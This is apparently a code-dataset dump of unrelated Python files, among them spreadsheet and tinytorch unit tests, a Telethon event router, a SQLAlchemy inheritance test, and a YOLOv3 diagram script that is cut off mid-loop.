content
stringlengths 0
894k
| type
stringclasses 2
values |
---|---|
import unittest
import os
import spreadsheet
from Exceptions import *
from Cell import Cell
class ReadTests(unittest.TestCase):
    """Tests for ``spreadsheet.read_command``."""

    def setUp(self):
        # Every test starts from an empty sheet.
        spreadsheet.spreadsheet = {}

    def test_read_command__malformatted_arg(self):
        # A bare number is not a valid cell reference.
        with self.assertRaises(InputException):
            spreadsheet.read_command("1")

    def test_read_command__not_in_spreadsheet(self):
        spreadsheet.spreadsheet = {"V7": Cell("V7")}
        self.assertEqual(spreadsheet.read_command("B8"), "<empty>")

    def test_read_command__success(self):
        target = Cell("B8")
        target.type = "TEXT"
        target.value = 42
        spreadsheet.spreadsheet = {"V7": Cell("V7"), "B8": target}
        self.assertEqual(spreadsheet.read_command("B8"), 42)

    def test_read_command__success_lowercase(self):
        # Lower-case cell names resolve to the same cell.
        target = Cell("B8")
        target.type = "TEXT"
        target.value = 42
        spreadsheet.spreadsheet = {"V7": Cell("V7"), "B8": target}
        self.assertEqual(spreadsheet.read_command("b8"), 42)
class WriteTests(unittest.TestCase):
    """Tests for ``spreadsheet.write_command``: plain values, formulas,
    cell references, and the built-in formula functions."""

    def setUp(self):
        # Every test starts from an empty sheet.
        spreadsheet.spreadsheet = {}

    def test_write_command__malformatted_args(self):
        # A cell name without a value is rejected.
        with self.assertRaises(InputException):
            spreadsheet.write_command("a1")

    def test_write_command__success_int(self):
        result = spreadsheet.write_command("a1 1")
        self.assertEqual(result, 1)
        self.assertEqual(type(result), int)

    def test_write_command__success_lowercase(self):
        # Cell names are normalized to upper case on write.
        spreadsheet.write_command("a1 hi")
        self.assertTrue("A1" in spreadsheet.spreadsheet)

    def test_write_command__success_float(self):
        result = spreadsheet.write_command("a1 1.2")
        self.assertEqual(result, 1.2)
        self.assertEqual(type(result), float)

    def test_write_command__success_text(self):
        result = spreadsheet.write_command("a1 hi")
        self.assertEqual(result, "hi")
        self.assertEqual(type(result), str)

    def test_write_command__formula_constant_number(self):
        # A numeric formula constant evaluates to float, not int.
        result = spreadsheet.write_command("a1 =1")
        self.assertEqual(result, 1.0)
        self.assertEqual(type(result), float)

    def test_write_command__formula_constant_text(self):
        result = spreadsheet.write_command("a1 =\"hi\"")
        self.assertEqual(result, "hi")
        self.assertEqual(type(result), str)

    def test_write_command__formula_reference(self):
        # ~a1 dereferences another cell's value.
        spreadsheet.write_command("a1 =666")
        result = spreadsheet.write_command("a2 =~a1")
        self.assertEqual(result, 666)

    def test_write_command__formula_reference_doesnt_exist(self):
        with self.assertRaises(FormulaException):
            spreadsheet.write_command("a2 =~a1")

    def test_write_command__formula_reference_cyclic_dep(self):
        # The first write may itself fail (a2 does not exist yet); either
        # way the reverse reference must be rejected as a cycle.
        try:
            spreadsheet.write_command("a1 =~a2")
        except FormulaException:
            pass
        with self.assertRaises(FormulaException):
            spreadsheet.write_command("a2 =~a1")

    def test_write_command__formula_func_min(self):
        result = spreadsheet.write_command("a1 =MIN(1,2)")
        self.assertEqual(result, 1)

    def test_write_command__formula_func_max(self):
        result = spreadsheet.write_command("a1 =MAX(1,2)")
        self.assertEqual(result, 2)

    def test_write_command__formula_func_concat(self):
        result = spreadsheet.write_command("a1 =CONCAT(\"hi\",\"ho\")")
        self.assertEqual(result, "hiho")

    def test_write_command__formula_func_lookup(self):
        spreadsheet.write_command("a1 1")
        spreadsheet.write_command("a2 2")
        spreadsheet.write_command("b1 10")
        spreadsheet.write_command("b2 20")
        result = spreadsheet.write_command("c1 =LOOKUP(\"A1:B2\",1,1)")
        self.assertEqual(result, 10)

    def test_write_command__formula_func_lookup_lowercase(self):
        # The range argument tolerates lower-case cell names.
        spreadsheet.write_command("a1 1")
        spreadsheet.write_command("a2 2")
        spreadsheet.write_command("b1 10")
        spreadsheet.write_command("b2 20")
        result = spreadsheet.write_command("c1 =LOOKUP(\"a1:B2\",1,1)")
        self.assertEqual(result, 10)

    def test_write_command__formula_func_sum(self):
        spreadsheet.write_command("a1 1")
        spreadsheet.write_command("a2 2")
        spreadsheet.write_command("a3 10")
        result = spreadsheet.write_command("a4 =SUM(\"A1:A3\")")
        self.assertEqual(result, 13)

    def test_write_command__formula_func_mean(self):
        spreadsheet.write_command("a1 2")
        spreadsheet.write_command("a2 3")
        spreadsheet.write_command("a3 10")
        result = spreadsheet.write_command("a4 =MEAN(\"A1:A3\")")
        self.assertEqual(result, 5)

    def test_write_command__formula_add(self):
        result = spreadsheet.write_command("a1 =1+2")
        self.assertEqual(result, 3)

    def test_write_command__formula_multiply(self):
        result = spreadsheet.write_command("a1 =3*5")
        self.assertEqual(result, 15)

    def test_write_command__formula_bracketed(self):
        result = spreadsheet.write_command("a1 =(3*5)")
        self.assertEqual(result, 15)

    def test_write_command__formula_spaced(self):
        # Whitespace inside formulas must be tolerated.
        spreadsheet.write_command("h1 9")
        result = spreadsheet.write_command("a1 = 2 * ( 3 + 5 ) + MIN( 3 , 2 ) * ~H1")
        self.assertEqual(result, 34)
class SaveTests(unittest.TestCase):
    """Round-trip persistence tests for save_sheet/open_sheet."""

    def setUp(self):
        spreadsheet.spreadsheet = {}

    def test_save_and_open(self):
        path = "file.out"
        spreadsheet.write_command("a1 hi")
        spreadsheet.save_sheet(path)
        # Wipe the in-memory sheet, then reload it from disk.
        spreadsheet.spreadsheet = {}
        self.assertTrue("A1" not in spreadsheet.spreadsheet)
        spreadsheet.open_sheet(path)
        self.assertEqual(spreadsheet.read_command("a1"), "hi")
        os.remove(path)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
python
|
# -*- coding: utf-8 -*-
"""INK system utilities module.
"""
from base64 import b64encode
import hashlib
import sys
from ink.sys.config import CONF
def verbose_print(msg: str):
    """
    Verbose Printer.
    Print called message if verbose mode is on.
    """
    # Bail out unless verbose mode is enabled AND a level is configured.
    if CONF.debug.verbose and CONF.debug.verbose_level:
        verbose_level = CONF.debug.verbose_level
    else:
        return
    # NOTE(review): at verbose_level >= 3 the message is printed twice
    # ('> msg' and '>> msg'); confirm whether this cumulative output is
    # intentional or whether these branches should be exclusive (elif).
    if verbose_level > 1:
        print('> ' + msg, file=sys.stderr)
    if verbose_level > 2:
        print('>> ' + msg, file=sys.stderr)
def secure_hash(value: str, salt: str) -> str:
"""
Secure Hash Function
secure_hashing() is hashing arg[1] string and return hashed string.
Using hash function is BLAKE2B and digest size is 32.
"""
salt = salt.encode('utf-8')
# https://github.com/PyCQA/pylint/issues/2478
# https://github.com/PyCQA/pylint/issues/2551
hashobj = hashlib.blake2b(key=salt, digest_size=32) # pylint: disable=E1123
hashobj.update(value.encode('utf-8'))
return b64encode(hashobj.digest()).decode()
|
python
|
import discord
import asyncio
import MyClient
from threading import Thread
# Proof-of-concept: run a custom discord.py client (MyClient) that
# records voice.
print("Discord.py Voice Recorder POC")
# NOTE(review): the token is empty — it must be filled in (ideally read
# from an environment variable) before this script can connect.
DISCORD_TOKEN = ""
client = MyClient.MyClient()
client.run(DISCORD_TOKEN)
|
python
|
import asyncio
import copy
import functools
from contextlib import contextmanager
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
Generator,
List,
Optional,
Reversible,
Tuple,
Type,
TypeVar,
Union,
)
from telethon.client.updates import EventBuilderDict
from telethon.events import common
import _garnet.patched_events as pe
from _garnet.events.action import AfterFilterAction, NoAction, ensure_action
from _garnet.events.filter import Filter, ensure_filter
from _garnet.events.handler import (
AsyncFunctionHandler,
EventHandler,
ensure_handler,
)
from _garnet.events.user_cage import KeyMakerFn, UserCage
from _garnet.loggers import events
from _garnet.vars import fsm as fsm_ctx
from _garnet.vars import handler as h_ctx
from _garnet.vars import user_and_chat as uc_ctx
if TYPE_CHECKING:
from _garnet.client import TelegramClient
from _garnet.storages.base import BaseStorage
from _garnet.storages.typedef import StorageDataT
# Event type variable, bound to Telethon's EventBuilder.
ET = TypeVar("ET", bound=common.EventBuilder)
# Middleware callable: receives the handler class and the event.
UnwrappedIntermediateT = Callable[[Type[EventHandler], common.EventCommon], Any]
__ProxyT = TypeVar("__ProxyT")
# A handler may be registered as an EventHandler subclass or an async function.
_EventHandlerGT = Union[
    Type[EventHandler[__ProxyT]], AsyncFunctionHandler[__ProxyT],
]
# A filter paired with the action to run when the filter rejects an event.
FilterWithAction = Tuple[Filter[ET], Type[AfterFilterAction[ET]]]
async def check_filter(
    built: EventBuilderDict,
    filter_: Tuple[
        Filter[Optional[ET]], Type[AfterFilterAction[Optional[ET], Any]],
    ],
    /,
) -> bool:
    """Evaluate one (filter, error-action) pair against a built event.

    Returns True when the filter passes; otherwise the error action is
    scheduled as a fire-and-forget task and False is returned.
    """
    f, on_err_action = filter_
    if event := built[f.event_builder]:
        # Event-aware filter: expose the event via its contextvar for the
        # duration of the call, then restore the previous value.
        event_token = event.set_current(event)
        try:
            if await f.call(event) is True:
                return True
            else:
                asyncio.create_task(on_err_action(event, f).call())
                return False
        finally:
            event.reset_current(event_token)
    else:
        events.debug(
            f"Got event-naive filter: {filter_!r}, "
            f"calling it with default `None`"
        )
        # Event-naive filter: called with None. Note `event` is the falsy
        # walrus result here, so the error action also receives it as-is.
        if await f.call(None) is not True:
            asyncio.create_task(on_err_action(event, f).call())
            return False
        return True
def _map_filters(
    for_event: Optional[Type[ET]],
    filters: Tuple[Union[Filter[Optional[ET]], FilterWithAction[Optional[ET]]]],
) -> Generator[FilterWithAction, None, None]:
    """Normalize each entry to an (ensured filter, ensured action) pair.

    Bare filters get NoAction as their failure action.
    """
    for entry in filters:
        if isinstance(entry, tuple):
            raw_filter, raw_action = entry
        else:
            raw_filter, raw_action = entry, NoAction
        yield ensure_filter(for_event, raw_filter), ensure_action(
            raw_action, for_event
        )
class Router:
    """Router table.

    Holds event handlers, router-level ("upper") filters, middleware
    ("intermediates"), and child routers; dispatches incoming updates to
    the first matching handler.
    """

    __slots__ = (
        "event",
        "_handlers",
        "upper_filters",
        "_intermediates",
        "children",
        "_cage_key_maker_f",
    )

    def __init__(
        self,
        default_event: Optional[ET] = None,
        *upper_filters: Union[
            Filter[Optional[ET]], FilterWithAction[Optional[ET]]
        ],
        cage_key_maker: Optional[KeyMakerFn] = None,
    ):
        """
        :param default_event: Default event
        :param upper_filters: Filters to be used to test event
            when event reaches this router
        :param cage_key_maker: optional key-maker forwarded to UserCage
        """
        self.event = default_event
        self._handlers: List[Type[EventHandler[ET]]] = []
        if default_event is not None:
            # NOTE(review): _map_filters returns a *generator*, which is
            # exhausted after one full iteration — yet upper_filters is
            # iterated per-update in _notify_filters, unpacked in
            # __deepcopy__, and len()-ed in __str__. Confirm this should
            # not be materialized, e.g. tuple(_map_filters(...)).
            self.upper_filters = _map_filters(default_event, upper_filters)
        else:
            self.upper_filters = upper_filters
        self._intermediates: List[UnwrappedIntermediateT] = []
        self.children: "List[Router]" = []
        self._cage_key_maker_f = cage_key_maker

    def __deepcopy__(self, memo: Dict[Any, Any]) -> "Router":
        # Children are deep-copied; handler and intermediate lists are
        # shared with the original — presumably intentional, TODO confirm.
        copied = self.__class__(
            self.event,
            *self.upper_filters,
            cage_key_maker=self._cage_key_maker_f,
        )
        copied._handlers = self._handlers
        copied._intermediates = self._intermediates
        copied.children = [
            copy.deepcopy(child, memo=memo) for child in self.children
        ]
        return copied

    def add_use(self, intermediate: UnwrappedIntermediateT) -> None:
        """
        Add async generator function to intermediates.
        :param intermediate: asynchronous generator function
        """
        self._intermediates.append(intermediate)

    def use(self) -> Callable[[UnwrappedIntermediateT], UnwrappedIntermediateT]:
        """
        Use `.use(...)` for adding router check layer
        Example:
        >>> from garnet.events import Router
        >>> router = Router()
        >>>
        >>> @router.use()
        ... async def router_intermediate(handler, event):
        ...     try:
        ...         await handler(event)
        ...     finally:
        ...         print("another iteration, another update")
        """
        def decorator(func: UnwrappedIntermediateT) -> UnwrappedIntermediateT:
            self.add_use(func)
            return func
        return decorator

    def include(self, router: "Router", /) -> "Router":
        """Include router in `Self` and return `Self`"""
        if self is router:
            raise ValueError(f"Router({router!r}) cannot include it to itself.")
        if router in self.children:
            raise ValueError(
                f"Router({router!r}) is already included for {self!r}."
            )
        self.children.append(router)
        return self

    @property
    def handlers(self) -> Generator[Type[EventHandler[ET]], None, None]:
        """Deep traverse of inner handlers."""
        for handler in self._handlers:
            yield handler
        for child in self.children:
            yield from child.handlers

    @property
    def intermediates(self) -> Generator[UnwrappedIntermediateT, None, None]:
        """Deep traverse of inner intermediates."""
        for handler in self._intermediates:
            yield handler
        for child in self.children:
            yield from child.intermediates

    @classmethod
    def _wrap_intermediates(
        cls,
        intermediates: Reversible[UnwrappedIntermediateT],
        handler: Type[EventHandler[ET]],
    ) -> Callable[[ET], Any]:
        # Build an onion: the last-added intermediate wraps closest to the
        # handler; callers invoke the outermost layer.
        @functools.wraps(handler)
        def mpa(event: ET) -> Any:
            return handler(event)
        for inter in reversed(intermediates):
            mpa = functools.partial(inter, mpa)
        return mpa

    async def _notify_filters(self, built: EventBuilderDict) -> bool:
        """Shallow call"""
        # All upper filters must pass for this router to see the update.
        for filter_ in self.upper_filters:
            if not await check_filter(built, filter_):
                return False
        return True

    @contextmanager
    def _contexvars_context(
        self,
        storage: "BaseStorage[StorageDataT]",
        event: ET,
        client: "TelegramClient",
        /,
    ):
        # Install event / FSM cage / client contextvars for the duration
        # of one handler invocation, restoring previous values on exit.
        with uc_ctx.current_user_and_chat_ctx_manager(event):
            fsm_context = UserCage(
                storage,
                uc_ctx.ChatIDCtx.get(),
                uc_ctx.UserIDCtx.get(),
                self._cage_key_maker_f,
            )
            event_token = event.set_current(event)
            fsm_token = fsm_ctx.CageCtx.set(fsm_context)
            client_token = client.set_current(client)
            try:
                yield
            finally:
                event.reset_current(event_token)
                fsm_ctx.CageCtx.reset(fsm_token)
                client.reset_current(client_token)

    async def _notify_handlers(
        self,
        built: EventBuilderDict,
        storage: "BaseStorage[StorageDataT]",
        client: "TelegramClient",
        /,
    ) -> bool:
        """Shallow call."""
        for handler in self._handlers:
            if event := built[handler.__event_builder__]:
                with self._contexvars_context(
                    storage, event, client,
                ):
                    events.debug(
                        "Current context configuration: {"
                        f"CHAT_ID={uc_ctx.ChatIDCtx.get()},"
                        f"USER_ID={uc_ctx.UserIDCtx.get()},"
                        "}"
                    )
                    handler_token = None
                    try:
                        handler_token = h_ctx.HandlerCtx.set(handler)
                        # for/else: the handler runs only when no filter
                        # failed (a failing filter breaks out, skipping
                        # the else clause).
                        for hf in handler.filters:
                            assert isinstance(hf, tuple), (
                                "Got unchecked " "handler, " "won't execute. "
                            )
                            if await check_filter(built, hf):
                                continue
                            break
                        else:
                            await self._wrap_intermediates(
                                self._intermediates, handler,
                            )(event)
                            return True
                    except pe.StopPropagation:
                        events.debug(
                            f"Stopping propagation for all next handlers "
                            f"after {handler!r}"
                        )
                        break
                    except pe.SkipHandler:
                        events.debug(f"Skipping handler({handler!r}) execution")
                        continue
                    finally:
                        if handler_token:
                            h_ctx.HandlerCtx.reset(handler_token)
        return False

    async def notify(
        self,
        storage: "BaseStorage[StorageDataT]",
        built: EventBuilderDict,
        client: "TelegramClient",
        /,
    ) -> None:
        """Notify router and its children about update."""
        if await self._notify_filters(built) and await self._notify_handlers(
            built, storage, client
        ):
            return
        # NOTE(review): `return` inside the loop means only the FIRST
        # child is ever notified — confirm siblings should be skipped.
        for router in self.children:
            return await router.notify(storage, built, client)

    # noinspection PyTypeChecker
    def message(
        self, *filters: "Filter[ET]",
    ) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
        """Decorator for `garnet.events.NewMessage` event handlers."""
        def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
            f_or_class_to_reg = ensure_handler(f_or_class, pe.NewMessage)
            self.register(f_or_class_to_reg, filters, event=pe.NewMessage)
            return f_or_class
        return decorator

    # noinspection PyTypeChecker
    def callback_query(
        self, *filters: "Filter[ET]",
    ) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
        """Decorator for `garnet.events.CallbackQuery` event handlers."""
        def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
            f_or_class_to_reg = ensure_handler(f_or_class, pe.CallbackQuery)
            self.register(f_or_class_to_reg, filters, event=pe.CallbackQuery)
            return f_or_class
        return decorator

    # noinspection PyTypeChecker
    def chat_action(
        self, *filters: "Union[Filter[ET], FilterWithAction[ET]]",
    ) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
        """Decorator for `garnet.events.ChatAction` event handlers."""
        def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
            f_or_class_to_reg = ensure_handler(f_or_class, pe.ChatAction)
            self.register(f_or_class_to_reg, filters, event=pe.ChatAction)
            return f_or_class
        return decorator

    # noinspection PyTypeChecker
    def message_edited(
        self, *filters: "Union[Filter[ET], FilterWithAction[ET]]",
    ) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
        """Decorator for `garnet.events.MessageEdited` event handlers."""
        def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
            f_or_class_to_reg = ensure_handler(f_or_class, pe.MessageEdited)
            self.register(f_or_class_to_reg, filters, event=pe.MessageEdited)
            return f_or_class
        return decorator

    def default(
        self, *filters: "Union[Filter[ET], FilterWithAction[ET]]",
    ) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
        """Decorator for router's default event event handlers."""
        # NOTE(review): this raises when self.event *is* an EventBuilder
        # subclass, which looks inverted relative to the error message
        # below — confirm the intended condition.
        if self.event is None or (
            isinstance(self.event, type)
            and issubclass(self.event, common.EventBuilder)
        ):
            raise ValueError(
                "In order to use default event_builder declare it in "
                "Router(...). "
                f"Expected type {common.EventBuilder} got {type(self.event)!s}"
            )
        def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
            assert self.event is not None
            f_or_class_to_reg = ensure_handler(f_or_class, self.event)
            self.register(f_or_class_to_reg, filters, event=self.event)
            return f_or_class
        return decorator

    def on(
        self,
        event_builder: "Type[common.EventBuilder]",
        /,
        *filters: "Union[Filter[ET], FilterWithAction[ET]]",
    ) -> Callable[[_EventHandlerGT[ET]], _EventHandlerGT[ET]]:
        """Decorator for a specific event-aware event handlers."""
        def decorator(f_or_class: _EventHandlerGT[ET]) -> _EventHandlerGT[ET]:
            f_or_class_to_reg = ensure_handler(f_or_class, event_builder)
            self.register(f_or_class_to_reg, filters, event=event_builder)
            return f_or_class
        return decorator

    def register(
        self,
        handler: "Type[EventHandler[ET]]",
        filters: "Tuple[Union[Filter[ET], FilterWithAction[ET]], ...]",
        event: "Type[common.EventBuilder]",
    ) -> "Router":
        """
        Entrypoint for registering event handlers on particular event builders.
        """
        handler = ensure_handler(handler, event_builder=event)
        # Append to (or initialize) the handler's own filter tuple.
        if handler.filters:
            handler.filters += tuple(_map_filters(event, filters))
        else:
            handler.filters = tuple(_map_filters(event, filters))
        self._handlers.append(handler)
        return self

    def __str__(self) -> str:
        return (
            f"{self.__class__.__name__} stats("
            f"children={len(self.children)}, "
            f"own_handlers={len(self._handlers)}, "
            f"own_filters={len(self.upper_filters)}, "
            f"own_intermediates={len(self._intermediates)}"
            f") at {hex(id(self))}"
        )

    __repr__ = __str__
|
python
|
# -*- coding: utf-8 -*-
""" Manifest Decorator Tests
"""
from django.urls import reverse
from tests.base import ManifestTestCase
class DecoratorTests(ManifestTestCase):
    """Tests for :mod:`decorators <manifest.decorators>`.
    """

    def test_secure_required(self):
        """Should redirect to secured version of page
        if ``MANIFEST_USE_HTTPS`` setting is ``True``.
        """
        with self.defaults(MANIFEST_USE_HTTPS=True):
            response = self.client.get(reverse("auth_login"))
            # Expect a permanent (301) redirect to the https scheme.
            self.assertEqual(response.status_code, 301)
            # ``assertRedirects`` is unusable here because the redirect
            # target page does not exist; inspect the header directly.
            self.assertIn("https", response.get("Location"))
|
python
|
# Arithmetic operators
22 + 22   # Addition
22 - 2    # Subtraction
22 / 2    # Division
22 // 2   # Integer (floor) division
22 * 2    # Multiplication
22 % 2    # Modulo
22 ** 2   # Exponentiation
# Assignment operators
numero = 0
numero += 2
numero -= 1
numero *= 9
numero /= 3   # note: / always yields float, so numero becomes 3.0
# Comparison operators
numero1 = 5
numero2 = 3
print(numero1 == numero2)
print(numero1 != numero2)
print(numero1 > numero2)
print(numero1 < numero2)
print(numero1 >= numero2)
print(numero1 <= numero2)
|
python
|
from sqlalchemy import *
import testbase
class SingleInheritanceTest(testbase.AssertMixin):
    """Single-table inheritance: Employee/Manager/Engineer/JuniorEngineer
    all mapped onto one 'employees' table discriminated by the 'type'
    column.

    NOTE(review): uses a legacy SQLAlchemy 0.x API (BoundMetaData,
    session.save, Query.select) — will not run on modern SQLAlchemy.
    """

    def setUpAll(self):
        metadata = BoundMetaData(testbase.db)
        global employees_table
        employees_table = Table('employees', metadata,
            Column('employee_id', Integer, primary_key=True),
            Column('name', String(50)),
            Column('manager_data', String(50)),
            Column('engineer_info', String(50)),
            Column('type', String(20))
        )
        employees_table.create()

    def tearDownAll(self):
        employees_table.drop()

    def testbasic(self):
        class Employee(object):
            def __init__(self, name):
                self.name = name
            def __repr__(self):
                return self.__class__.__name__ + " " + self.name

        class Manager(Employee):
            def __init__(self, name, manager_data):
                self.name = name
                self.manager_data = manager_data
            def __repr__(self):
                return self.__class__.__name__ + " " + self.name + " " + self.manager_data

        class Engineer(Employee):
            def __init__(self, name, engineer_info):
                self.name = name
                self.engineer_info = engineer_info
            def __repr__(self):
                return self.__class__.__name__ + " " + self.name + " " + self.engineer_info

        class JuniorEngineer(Engineer):
            pass

        # The 'type' column carries each row's polymorphic identity.
        employee_mapper = mapper(Employee, employees_table, polymorphic_on=employees_table.c.type)
        manager_mapper = mapper(Manager, inherits=employee_mapper, polymorphic_identity='manager')
        engineer_mapper = mapper(Engineer, inherits=employee_mapper, polymorphic_identity='engineer')
        junior_engineer = mapper(JuniorEngineer, inherits=engineer_mapper, polymorphic_identity='juniorengineer')

        session = create_session()
        m1 = Manager('Tom', 'knows how to manage things')
        e1 = Engineer('Kurt', 'knows how to hack')
        e2 = JuniorEngineer('Ed', 'oh that ed')
        session.save(m1)
        session.save(e1)
        session.save(e2)
        session.flush()

        # Querying a class must return rows of that identity and below.
        assert session.query(Employee).select() == [m1, e1, e2]
        assert session.query(Engineer).select() == [e1, e2]
        assert session.query(Manager).select() == [m1]
        assert session.query(JuniorEngineer).select() == [e2]
|
python
|
import pytest
from hypothesis import given
from tests.strategies import med_ints, small_floats
from tinytorch import module
class ModuleA1(module.Module):
    """Root module: one parameter, a plain attribute, and two submodules."""

    def __init__(self):
        super().__init__()
        self.p1 = module.Parameter(5)
        # Plain attribute — must NOT be collected as a parameter.
        self.non_param = 10
        self.a = ModuleA2()
        self.b = ModuleA3()
class ModuleA2(module.Module):
    """Leaf submodule with a single parameter."""

    def __init__(self):
        super().__init__()
        self.p2 = module.Parameter(10)
class ModuleA3(module.Module):
    """Intermediate submodule with no parameters of its own."""

    def __init__(self):
        super().__init__()
        self.c = ModuleA4()
class ModuleA4(module.Module):
    """Deepest leaf submodule with a single parameter."""

    def __init__(self):
        super().__init__()
        self.p3 = module.Parameter(15)
def test_stacked_demo():
    "Check that each of the properties match"
    root = ModuleA1()
    params = dict(root.named_parameters())
    rendered = str(root)
    print(rendered)
    # Direct attribute access still works on modules.
    assert root.p1.value == 5
    assert root.non_param == 10
    # named_parameters collects recursively under dotted paths.
    assert params["p1"].value == 5
    assert params["a.p2"].value == 10
    assert params["b.c.p3"].value == 15
# ## Advanced Tests
# These tests generate a stack of modules of varying sizes to check
# properties.

# Sentinel parameter values used throughout the stacked-module tests.
VAL_A = 50
VAL_B = 100
class Module1(module.Module):
    """Two Module2 children of configurable size plus one own parameter."""

    def __init__(self, size_a, size_b, val):
        super().__init__()
        self.module_a = Module2(size_a)
        self.module_b = Module2(size_b)
        self.parameter_a = module.Parameter(val)
class Module2(module.Module):
    """Two fixed parameters, a non-parameter attribute, a Module3 child,
    and *extra* dynamically added (None-valued) parameters."""

    def __init__(self, extra=0):
        super().__init__()
        self.parameter_a = module.Parameter(VAL_A)
        self.parameter_b = module.Parameter(VAL_B)
        # Plain attribute — must not show up in parameters().
        self.non_parameter = 10
        self.module_c = Module3()
        for i in range(extra):
            self.add_parameter(f"extra_parameter_{i}", None)
class Module3(module.Module):
    """Leaf module with a single parameter."""

    def __init__(self):
        super().__init__()
        self.parameter_a = module.Parameter(VAL_A)
@given(med_ints, med_ints)
def test_module(size_a, size_b):
    "Check the properties of a single module"
    # Fix: the local variable used to be named `module`, shadowing the
    # imported `tinytorch.module` package inside this function.
    mod = Module2()
    mod.eval()
    assert not mod.training
    mod.train()
    assert mod.training
    # parameter_a, parameter_b, and module_c.parameter_a.
    assert len(mod.parameters()) == 3

    mod = Module2(size_b)
    assert len(mod.parameters()) == size_b + 3

    mod = Module2(size_a)
    named_parameters = dict(mod.named_parameters())
    assert named_parameters["parameter_a"].value == VAL_A
    assert named_parameters["parameter_b"].value == VAL_B
    # Dynamically added parameters default to None.
    assert named_parameters["extra_parameter_0"].value is None
@given(med_ints, med_ints, small_floats)
def test_stacked_module(size_a, size_b, val):
    "Check the properties of a stacked module"
    # Fix: the local variable used to be named `module`, shadowing the
    # imported `tinytorch.module` package inside this function.
    mod = Module1(size_a, size_b, val)
    # eval/train must propagate to submodules.
    mod.eval()
    assert not mod.training
    assert not mod.module_a.training
    assert not mod.module_b.training
    mod.train()
    assert mod.training
    assert mod.module_a.training
    assert mod.module_b.training
    assert len(mod.parameters()) == 1 + (size_a + 3) + (size_b + 3)

    named_parameters = dict(mod.named_parameters())
    assert named_parameters["parameter_a"].value == val
    assert named_parameters["module_a.parameter_a"].value == VAL_A
    assert named_parameters["module_a.parameter_b"].value == VAL_B
    assert named_parameters["module_b.parameter_a"].value == VAL_A
    assert named_parameters["module_b.parameter_b"].value == VAL_B
# ## Misc Tests
# Check that the module runs forward correctly.
class ModuleRun(module.Module):
    """Minimal module whose forward always returns 10."""

    def forward(self):
        return 10
@pytest.mark.xfail
def test_module_fail_forward():
    # The base Module defines no forward; calling it must raise.
    base = module.Module()
    base()
def test_module_forward():
    runner = ModuleRun()
    assert runner.forward() == 10
    # __call__ must delegate to forward.
    assert runner() == 10
# Internal check for the system.
class MockParam:
    """Stand-in tensor that records whether requires_grad_ was called."""

    def __init__(self):
        # Last value passed to requires_grad_; False until then.
        self.x = False

    def requires_grad_(self, x):
        self.x = x
def test_parameter():
    tracked = MockParam()
    param = module.Parameter(tracked)
    print(param)
    # Wrapping a value must enable gradients on it.
    assert tracked.x
    replacement = MockParam()
    param.update(replacement)
    # Updating must enable gradients on the new value too.
    assert replacement.x
|
python
|
import sys
sys.path.append('../')
from pycore.tikzeng import *
import math
# Parse the YOLOv3 architecture description into a list of layer dicts.
# Each line looks like: "<id> <type> ... -> <height> x <depth> x<width>".
network = []
f = open("./arch_yolov3.txt", "r")
for x in f:
    layer = {}
    input_1 = x.split()
    layer["id"] = input_1[0]
    layer["type"] = input_1[1]
    if("->" in x):
        input_2 = x.split("->")[1].split()
        layer["height"] = float(input_2[0])
        layer["depth"] = float(input_2[2])
        #handle filter size of 1024 where no space is present after x
        if( not input_2[3].isalpha()):
            layer["width"]= float(input_2[3][1:])
        else:
            layer["width"]= float(input_2[4])
    if("res" in x):
        # Residual source layer index (one before the listed layer).
        layer["from"] = str(int(input_1[2])-1)
    if("route" in x):
        layer["c1"] = input_1[2]
        # Route may have one or two source layers; second is optional.
        # NOTE(review): bare except swallows everything, not only
        # IndexError — consider narrowing.
        try:
            layer["c2"] = input_1[3]
        except:
            layer["c2"]=None
    network.append(layer)

# Scale factors converting feature-map sizes to drawing units.
WIDTH_SCALE=100
HEIGHT_SCALE=10
arch2 = [
    to_head( '..' ),
    to_cor(),
    to_begin()]
to_east="(0,0,0)"
yolos = []
# Walk the parsed layers and emit a tikz node (l) plus connections (c)
# per layer. `to` tracks the id of the previously drawn node.
# NOTE(review): `to` is first assigned only at the bottom of the loop;
# branches that read it on the very first drawn layer rely on the input
# file starting with a conv layer — confirm.
for i, layer in enumerate(network):
    c = []
    l = None
    if (layer["type"] == "conv" ):
        if(network[i-1]["type"]!="conv" ): # and network[i+1]["type"]=="conv"
            l = to_Conv(layer["id"],"",str(int(layer["width"])), offset="(1,0,0)", to=to_east, height=layer["height"]/HEIGHT_SCALE,depth=layer["depth"]/HEIGHT_SCALE, width=layer["width"]/WIDTH_SCALE)
            if(i - 1 > 0):
                if(to != None): c.append(to_connection(to,layer["id"]))
        elif(network[i+1]["type"]!="conv"):
            l = to_Conv(layer["id"],str(int(layer["height"])),str(int(layer["width"])), offset="(0,0,0)", to=to_east, height=layer["height"]/HEIGHT_SCALE,depth=layer["depth"]/HEIGHT_SCALE, width=layer["width"]/WIDTH_SCALE)
        else:
            l = to_Conv(layer["id"],"",str(int(layer["width"])), offset="(0,0,0)", to=to_east, height=layer["height"]/HEIGHT_SCALE,depth=layer["depth"]/HEIGHT_SCALE, width=layer["width"]/WIDTH_SCALE)
    if ( layer["type"] == "upsample"):
        #if(network[i-1]["type"]!="conv" ): # and network[i+1]["type"]=="conv"
        l = to_UnPool(layer["id"], offset="(1,0,0)", to=to_east, height=layer["height"]/HEIGHT_SCALE,depth=layer["depth"]/HEIGHT_SCALE, width=layer["width"]/WIDTH_SCALE)
        if(i - 1 > 0):
            if(to != None):
                c.append(to_connection(to,layer["id"]))
                c.append(to_Upscale(layer["id"], to))
    if (layer["type"] == "max"):
        l = to_Pool(layer["id"], offset="(0,0,0)", to=to_east, height=layer["height"]/HEIGHT_SCALE,depth=layer["depth"]/HEIGHT_SCALE, width=0.1)
